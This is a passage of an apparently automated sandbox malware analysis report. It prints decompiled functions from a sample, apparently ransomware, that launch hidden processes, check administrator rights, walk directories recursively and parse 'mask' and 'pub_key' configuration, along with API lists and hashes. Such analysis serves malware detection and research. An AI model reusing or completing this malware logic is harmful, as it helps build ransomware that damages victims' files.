				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xd82b08; // 0x0
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x00d74b1c
0x00d74b22
0x00d74b24
0x00d74b29
0x00d74b2e
0x00d74b36
0x00d74b39
0x00d74b3c
0x00d74b41
0x00d74b48
0x00d74b4d
0x00d74b58
0x00d74b77
0x00d74b8d
0x00d74b98
0x00d74b79
0x00d74b83
0x00d74b83

APIs

_memset.LIBCMT ref: 00D74B29
CreateProcessW.KERNEL32 ref: 00D74B6F
GetLastError.KERNEL32(?,?,00000000), ref: 00D74B79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00D74B8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00D74B92

Strings

D, xrefs: 00D74B58

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 8dff9d694d97d5ca43acd05924f694eb8d63639250ae866f6ceee670adc73d5c
Instruction ID: 6b01dbced73b5be44c4111ede8722c6512632f7ecabf3396d69d2d919bea7e5c
Opcode Fuzzy Hash: 8dff9d694d97d5ca43acd05924f694eb8d63639250ae866f6ceee670adc73d5c
Instruction Fuzzy Hash: 9A014471E50318ABDB10DFA4DC46BDEBBB8EF04710F104216FA08F6290E7B165548BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D73A60 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00D73A60() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x00d73a69
0x00d73a89
0x00d73a90
0x00d73a98
0x00d73aaf
0x00d73abe
0x00d73ac5
0x00d73ac7
0x00d73aca
0x00d73ad6
0x00d73a9d
0x00d73a9d
0x00d73a9d

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D73A90
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 00D73AA3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00D73AAF
FreeSid.ADVAPI32(?), ref: 00D73ACA

Strings

advapi32.dll, xrefs: 00D73A9E
CheckTokenMembership, xrefs: 00D73AA9

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: 1170383f89331a8d850af5b2a0dec78100baa5d91c0b1312623aced684b18d5e
Instruction ID: 40cc9e5e72d85ccc11d691f64742c0e0bbbeafa1e046b4f4ed0ac951ef13a1aa
Opcode Fuzzy Hash: 1170383f89331a8d850af5b2a0dec78100baa5d91c0b1312623aced684b18d5e
Instruction Fuzzy Hash: C7F04931A90309BBEF109BE0DC0EFADBB7CEB08701F004584F908E2291F7706A548BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D76769 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00D76769() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E00D763B0(_t46, _t51 - 0x264, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if( *((intOrPtr*)(_t51 - 0xc)) <  *_t38) {
										goto L8;
									}
								}
							}
						} else {
							E00D766F0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

0x00d76770
0x00d76784
0x00d767a8
0x00d767b1
0x00d767e2
0x00d767ed
0x00d767ef
0x00d767f2
0x00d767f5
0x00d767f7
0x00d76800
0x00d76800
0x00d76803
0x00d76803
0x00d767f9
0x00d767fc
0x00d767fe
0x00000000
0x00000000
0x00d767fe
0x00d767f7
0x00d767b3
0x00d767c7
0x00d767cc
0x00d76810
0x00d76810
0x00d76823
0x00d7682e
0x00d7683c

APIs

lstrcmpW.KERNEL32(?,00D80368,?,?), ref: 00D7677C
lstrcmpW.KERNEL32(?,00D8036C,?,?), ref: 00D76796
lstrcatW.KERNEL32(00000000,?), ref: 00D767A8
lstrcatW.KERNEL32(00000000,00D8039C), ref: 00D767B9

Part of subcall function 00D766F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00D76723
Part of subcall function 00D766F0: lstrcatW.KERNEL32(00000000,00D80364), ref: 00D7673B
Part of subcall function 00D766F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00D76745

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 00D7681D
FindClose.KERNEL32(00003000,?,?), ref: 00D7682E

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: dc5238f47e36825461a7bca4d96d836daba515dd90bf40b52aa8b6daaecff745
Instruction ID: 7c4bf0b9ba5b36a92e6ecd58d547292466702fa11816cc1923655230bcebe32b
Opcode Fuzzy Hash: dc5238f47e36825461a7bca4d96d836daba515dd90bf40b52aa8b6daaecff745
Instruction Fuzzy Hash: 7C01ED31A14219ABDF21AB60DC48BAE7BB8EF44744F0484A9F909D1160F7319A95DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D73200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D73200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

0x00d73205
0x00d73208
0x00d7320a
0x00d7320e
0x00d7321f
0x00d7321f
0x00d73223
0x00000000
0x00d73225
0x00d73226
0x00d7322a
0x00d73230
0x00d73235
0x00d73239
0x00000000
0x00000000
0x00d7323b
0x00000000
0x00d73239
0x00d73245
0x00d73245
0x00d73248
0x00d73248
0x00d7324e
0x00d73270
0x00d73273
0x00d73284
0x00d7328a
0x00000000
0x00d7328a
0x00d73250
0x00d73251
0x00d73262
0x00d73268
0x00d7328d
0x00d7328f
0x00d73293
0x00d73293
0x00d7328f
0x00d73299
0x00d732a5
0x00d732a5
0x00d73210
0x00d73210
0x00d73214
0x00d73217
0x00000000
0x00d73219
0x00d73219
0x00d7321d
0x00000000
0x00000000
0x00000000
0x00000000
0x00d7321d
0x00000000
0x00d73217
0x00d7323e
0x00d73242
0x00d73242
0x00000000

APIs

lstrlenA.KERNEL32(00D75135,00000000,?,00D75136,?,00D734BF,00D75136,00000001,00D75136,00000000,?,746566A0,?,?,00D75135,00000000), ref: 00D73251
GetProcessHeap.KERNEL32(00000008,00000001,?,00D734BF,00D75136,00000001,00D75136,00000000,?,746566A0,?,?,00D75135,00000000), ref: 00D7325B
HeapAlloc.KERNEL32(00000000,?,00D734BF,00D75136,00000001,00D75136,00000000,?,746566A0,?,?,00D75135,00000000), ref: 00D73262
lstrlenA.KERNEL32(00D75135,00000000,?,00D75136,?,00D734BF,00D75136,00000001,00D75136,00000000,?,746566A0,?,?,00D75135,00000000), ref: 00D73273
GetProcessHeap.KERNEL32(00000008,00000001,?,00D734BF,00D75136,00000001,00D75136,00000000,?,746566A0,?,?,00D75135,00000000), ref: 00D7327D
HeapAlloc.KERNEL32(00000000,?,00D734BF,00D75136,00000001,00D75136,00000000,?,746566A0,?,?,00D75135,00000000), ref: 00D73284
lstrcpyA.KERNEL32(00000000,00D75135,?,00D734BF,00D75136,00000001,00D75136,00000000,?,746566A0,?,?,00D75135,00000000), ref: 00D73293

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: 7adb0a9ddc7596b37b1912c1c33682df8cfe81f3a8bdd251cac8acdcd099bcda
Instruction ID: ba09e3b7c7b64159e00fdf6cf56d86a6e506dd964ab7084fa5dae24bf443bf10
Opcode Fuzzy Hash: 7adb0a9ddc7596b37b1912c1c33682df8cfe81f3a8bdd251cac8acdcd099bcda
Instruction Fuzzy Hash: ED1193324043956ADB210F68980C7A6BB68AF12360F688015ECCDCB252E7358D96E775

Uniqueness

Uniqueness Score: -1.00%

Function 00D733E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00D733E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E00D732B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E00D73320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E00D73190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E00D73200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x850f00e4
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

0x00d733e3
0x00d733e5
0x00d733e9
0x00d733eb
0x00d733ee
0x00d733f1
0x00d733f8
0x00d734db
0x00d734db
0x00d73410
0x00d73425
0x00d7342b
0x00d7342f
0x00000000
0x00d73431
0x00d73432
0x00d73434
0x00d7343a
0x00d73441
0x00d73444
0x00d7344a
0x00d7344b
0x00d734ba
0x00d7344d
0x00d7344e
0x00d73450
0x00d73452
0x00d73456
0x00d73467
0x00d73467
0x00d7346b
0x00d7346d
0x00d73471
0x00d73473
0x00d73478
0x00d7347c
0x00000000
0x00000000
0x00d7347e
0x00000000
0x00d7347c
0x00d73480
0x00d73480
0x00d73483
0x00d73484
0x00d73495
0x00d7349e
0x00d734a3
0x00d734a7
0x00d734a7
0x00d734ad
0x00d734b0
0x00d734b0
0x00000000
0x00d73458
0x00d7345c
0x00d7345f
0x00000000
0x00d73461
0x00d73461
0x00d73465
0x00000000
0x00000000
0x00000000
0x00000000
0x00d73465
0x00000000
0x00d7345f
0x00d73458
0x00d73456
0x00d7344e
0x00d7344b
0x00d73444
0x00d734bf
0x00d734bf
0x00d734bf
0x00d734c2
0x00d734c3
0x00d734d6
0x00d734d6
0x00d73412
0x00d73412
0x00d73418
0x00d73422
0x00d73422

APIs

Part of subcall function 00D732B0: lstrlenA.KERNEL32(?,00000000,?,00D75135,?,?,00D733F6,?,746566A0,?,?,00D75135,00000000), ref: 00D732C5
Part of subcall function 00D732B0: lstrlenA.KERNEL32(?,?,00D733F6,?,746566A0,?,?,00D75135,00000000), ref: 00D732EE

lstrlenA.KERNEL32(00D75136,00D75136,00000000,?,746566A0,?,?,00D75135,00000000), ref: 00D73484
GetProcessHeap.KERNEL32(00000008,00000001,?,00D75135,00000000), ref: 00D7348E
HeapAlloc.KERNEL32(00000000,?,00D75135,00000000), ref: 00D73495
lstrcpyA.KERNEL32(00000000,00D75136,?,00D75135,00000000), ref: 00D734A7
ExitProcess.KERNEL32 ref: 00D734DB

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: dffe15d8ac37c34ca06d1bab6509893594904ebcd15538920695276e973514ea
Instruction ID: 61186afa4fb7cdada6fa07ec7c32de22b07372fea219e81a730c43ee39b642b7
Opcode Fuzzy Hash: dffe15d8ac37c34ca06d1bab6509893594904ebcd15538920695276e973514ea
Instruction Fuzzy Hash: F43139715043455ADB2A0F2888447B5BBA89B02318F5CC189E8CDC7381FA398E87E771

Uniqueness

Uniqueness Score: -1.00%

Function 00D73AE0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D73B32
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00D73B56
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00D73B5A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00D73B5E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00D73B85

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: 6db25151a6eec5842c1515f9c7d4c64cee6b089c9a47f197095e2de7e2f53414
Instruction ID: f33290841cbe39ddde63615c35b243ea12346ffae1b57ac82c649b3cbc9add78
Opcode Fuzzy Hash: 6db25151a6eec5842c1515f9c7d4c64cee6b089c9a47f197095e2de7e2f53414
Instruction Fuzzy Hash: 7B111EB0D4031C6EEB609B64DC1ABEA7BBCEF08700F008199A50CE62C1D6B54B948FE5

Uniqueness

Uniqueness Score: -1.00%

Function 00D74BA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00D74BA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xd7ff2c]");
				_t16 =  *0xd7ff34; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

0x00d74ba6
0x00d74bae
0x00d74bb4
0x00d74bb9
0x00d74bbc
0x00d74bc1
0x00d74bc6
0x00d74bc9
0x00d74c1a
0x00d74c1c
0x00000000
0x00d74c1e
0x00d74c22
0x00d74c5f
0x00d74c61
0x00000000
0x00d74c63
0x00d74c6d
0x00d74c70
0x00d74c70
0x00d74c74
0x00000000
0x00000000
0x00d74c7a
0x00d74c7a
0x00d74c7d
0x00d74c80
0x00d74c80
0x00d74c84
0x00000000
0x00000000
0x00d74c8e
0x00d74c8e
0x00000000
0x00d74c8a
0x00d74c8c
0x00000000
0x00000000
0x00d74c95
0x00d74ca4
0x00000000
0x00d74ca4
0x00d74c80
0x00d74c24
0x00d74c24
0x00d74c28
0x00d74c2f
0x00d74c31
0x00d74c31
0x00d74c36
0x00d74c4f
0x00d74c52
0x00000000
0x00000000
0x00000000
0x00000000
0x00d74c38
0x00d74c38
0x00d74c38
0x00d74c3c
0x00000000
0x00000000
0x00d74c45
0x00d74c47
0x00000000
0x00d74c49
0x00d74c49
0x00d74c4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00d74c4d
0x00000000
0x00d74c47
0x00000000
0x00d74c38
0x00000000
0x00d74c54
0x00d74c54
0x00d74c57
0x00d74c58
0x00d74c59
0x00d74c5d
0x00000000
0x00d74c28
0x00d74c22
0x00d74bcb
0x00d74bcb
0x00d74bcf
0x00d74c05
0x00d74c19
0x00d74bd1
0x00d74bd3
0x00d74bd5
0x00d74bd5
0x00d74bd9
0x00d74bf7
0x00d74bfa
0x00000000
0x00000000
0x00000000
0x00000000
0x00d74bdb
0x00d74be0
0x00d74be0
0x00d74be4
0x00000000
0x00000000
0x00d74bed
0x00d74bef
0x00000000
0x00d74bf1
0x00d74bf1
0x00d74bf5
0x00000000
0x00000000
0x00000000
0x00000000
0x00d74bf5
0x00000000
0x00d74bef
0x00000000
0x00d74be0
0x00000000
0x00d74bfc
0x00d74bfc
0x00d74bff
0x00d74c00
0x00d74c01
0x00000000
0x00d74bd5
0x00d74bcf
0x00000000

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,00D74E7E), ref: 00D74C0D
lstrlenA.KERNEL32(00000000,?,00D74E7E), ref: 00D74C67
lstrcpyA.KERNEL32(?,?,?,00D74E7E), ref: 00D74C98

Strings

fabian wosar <3, xrefs: 00D74C05

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: efacdad88ad1fc65b504ebbbaa4759c8ae2045f34c33cc913d54da26656913d9
Instruction ID: b48a394bcc9c495d793cb054081451981341e7f046babdf1292bacd8c21d7aca
Opcode Fuzzy Hash: efacdad88ad1fc65b504ebbbaa4759c8ae2045f34c33cc913d54da26656913d9
Instruction Fuzzy Hash: 1031F22180A2A55BDB238F6858243BABFA5AF43301F6DD199C8DD87216F7214C46C3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00D73190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D73190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

0x00d73193
0x00d73197
0x00d7319c
0x00d731b0
0x00d731b9
0x00d731ce
0x00d731d1
0x00d731d9
0x00d731e1
0x00d731e4
0x00d731e9
0x00d731a0
0x00d731a0
0x00d731a0
0x00d731a4
0x00000000
0x00000000
0x00d731a8
0x00d731ec
0x00000000
0x00d731aa
0x00d731aa
0x00d731ae
0x00000000
0x00000000
0x00000000
0x00000000
0x00d731ae
0x00000000
0x00d731a8
0x00d731f5
0x00d731f5
0x00000000

APIs

lstrcmpiA.KERNEL32(00D75135,mask,00D75136,?,?,00D73441,00D75136,00000000,?,746566A0,?,?,00D75135,00000000), ref: 00D731B9
lstrcmpiA.KERNEL32(00D75135,pub_key,?,00D73441,00D75136,00000000,?,746566A0,?,?,00D75135,00000000), ref: 00D731D1

Strings

mask, xrefs: 00D731B1
pub_key, xrefs: 00D731BF

Memory Dump Source

